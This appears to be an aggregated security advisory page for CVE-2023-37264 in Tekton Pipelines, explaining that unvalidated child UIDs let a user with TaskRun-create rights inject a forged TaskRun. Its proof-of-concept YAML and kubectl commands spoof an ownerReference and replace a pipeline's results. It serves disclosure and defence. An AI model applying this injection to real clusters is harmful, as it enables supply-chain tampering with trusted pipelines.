Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS13MmgzLXZ2dnEtM201M84AA0fs

Pipelines do not validate child UIDs

Summary

Pipelines do not validate child UIDs, which means that a user that has access to create TaskRuns can create their own Tasks that the Pipelines controller will accept as the child Task.

We should add UID to PipelineRun status and validate that child Run status/results only come from Runs matching the same UID.

Details

While we store and validate the PipelineRun's (api version, kind, name, uid) in the child Run's OwnerReference, we only store (api version, kind, name) in the ChildStatusReference .

This means that if a client had access to create TaskRuns on a cluster, they could create a child TaskRun for a pipeline with the same name + owner reference, and the Pipeline controller picks it up as if it was the original TaskRun. This is problematic since it can let users modify the config of Pipelines at runtime, which violates SLSA L2 Service Generated / Non-falsifiable requirements.

I believe this is also true for TaskRuns -> Pods since it looks like we only lookup by name, though I haven't tested this.

If you have update permissions on tekton resources, you could also perform a similar bypass like this (because it's difficult to distinguish this from a Task retry). For now, I think relying on RBAC is fine and treat update as a privileged role (though we should perhaps update docs to stress this). Create is the most problematic for now. SPIFFE/SPIRE might be able to help with ensuring that only the controller can modify state long term (e.g. sign the expected UIDs?)

PoC

apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1)
kind: PipelineRun
metadata:
  name: hello-pr
spec:
  pipelineSpec:
    tasks:
      - name: task1
        taskSpec:
          steps:
            - name: echo
              image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base)
              script: |
                sleep 60
      - name: task2
        runAfter: [task1]
        taskSpec:
          steps:
            - name: echo
              image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base)
              script: |
                echo "asdf" > $(results.foo.path)
          results:
            - name: foo
    results:
      - name: foo
        value: $(tasks.task2.results.foo)

Once this is running, grab the PR UID:

$ k get pr hello-pr -o json | jq .metadata.uid -r

While pipeline is running task 1, start fake task 2:

apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1)
kind: TaskRun
metadata:
  annotations:
  labels:
    [app.kubernetes.io/managed-by](http://app.kubernetes.io/managed-by): tekton-pipelines
    [tekton.dev/memberOf](http://tekton.dev/memberOf): tasks
    [tekton.dev/pipeline](http://tekton.dev/pipeline): hello-pr
    [tekton.dev/pipelineRun](http://tekton.dev/pipelineRun): hello-pr
    [tekton.dev/pipelineTask](http://tekton.dev/pipelineTask): task2
  name: hello-pr-task2
  namespace: default
  ownerReferences:
  - apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1)
    blockOwnerDeletion: true
    controller: true
    kind: PipelineRun
    name: hello-pr
    uid: af549647-4532-468b-90c5-29122a408f8d <--- this should be UID of PR fetched in last step
spec:
  serviceAccountName: default
  taskSpec:
    results:
    - name: foo
      type: string
    steps:
    - image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base)
      name: echo
      resources: {}
      script: |
        echo "zxcv" > $(results.foo.path)

Get pipeline results - it shows the output of the 2nd injected TaskRun

$ k get pr -o json hello-pr | jq .status.pipelineResults
[
  {
    "name": "foo",
    "value": "zxcv\n"
  }
]

Impact

This can be used to trick the Pipeline controller into associating unrelated Runs to the Pipeline, feeding its data through the rest of the Pipeline. This requires access to create TaskRuns, so impact may vary depending on your Tekton setup. If users already have unrestricted access to create any Task/PipelineRun, this does not grant any additional capabilities.

Worst case example would be a supply chain attack where a malicious TaskRun triggered from Triggers/Workflows intercepts and replaces a task in a trusted Pipeline.

Permalink: https://github.com/advisories/GHSA-w2h3-vvvq-3m53
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13MmgzLXZ2dnEtM201M84AA0fs
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Low
Classification: General
Published: 10 months ago
Updated: 6 months ago


CVSS Score: 3.7
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

Identifiers: GHSA-w2h3-vvvq-3m53, CVE-2023-37264
References: Repository: https://github.com/tektoncd/pipeline
Blast Radius: 11.3

Affected Packages

go:github.com/tektoncd/pipeline
Dependent packages: 336
Dependent repositories: 1,105
Downloads:
Affected Version Ranges: >= 0.35.0, <= 0.52.0
No known fixed version
All affected versions: 0.35.0, 0.35.1, 0.36.0, 0.36.1, 0.37.0, 0.37.1, 0.37.2, 0.37.3, 0.37.4, 0.37.5, 0.38.0, 0.38.1, 0.38.2, 0.38.3, 0.38.4, 0.39.0, 0.40.0, 0.40.1, 0.40.2, 0.41.0, 0.41.1, 0.41.2, 0.41.3, 0.42.0, 0.43.0, 0.43.1, 0.43.2, 0.44.0, 0.44.2, 0.44.3, 0.44.4, 0.44.5, 0.45.0, 0.46.0, 0.47.0, 0.47.1, 0.47.2, 0.47.3, 0.47.4, 0.47.5, 0.47.6, 0.47.7, 0.47.8, 0.47.9, 0.48.0, 0.49.0, 0.50.0, 0.50.1, 0.50.2, 0.50.3, 0.50.4, 0.50.5, 0.50.6, 0.51.0, 0.52.0